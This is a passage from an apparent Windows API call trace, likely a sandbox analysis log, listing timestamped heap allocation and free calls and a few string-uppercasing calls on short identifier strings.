(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0222.273] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0222.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0222.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0222.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab218 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0222.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0222.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0222.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0222.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0222.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0222.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.276] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0222.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0222.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0222.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0222.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0222.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0222.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0222.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0222.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.279] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0222.280] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0222.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0222.281] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab818 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 